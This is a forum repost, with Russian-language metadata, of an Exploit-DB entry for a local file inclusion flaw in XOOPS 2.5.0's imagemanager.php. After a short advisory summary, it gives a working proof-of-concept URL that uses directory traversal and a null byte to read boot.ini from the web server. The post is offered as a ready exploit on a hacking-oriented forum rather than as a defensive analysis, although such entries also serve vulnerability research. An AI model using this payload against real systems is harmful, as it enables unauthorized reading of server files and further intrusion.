Exploit XOOPS 2.5 - 'imagemanager.php' Local File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
35632
Проверка EDB
  1. Пройдено
Автор
KEDANS-DZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2011-04-18
Код:
source: https://www.securityfocus.com/bid/47418/info

XOOPS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view arbitrary local files within the context of the webserver process. Successfully exploiting this issue may lead to other attacks.

XOOPS 2.5.0 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/imagemanager.php?target=/../../../../../../../../boot.ini%00&op=upload
 
Источник
www.exploit-db.com

Похожие темы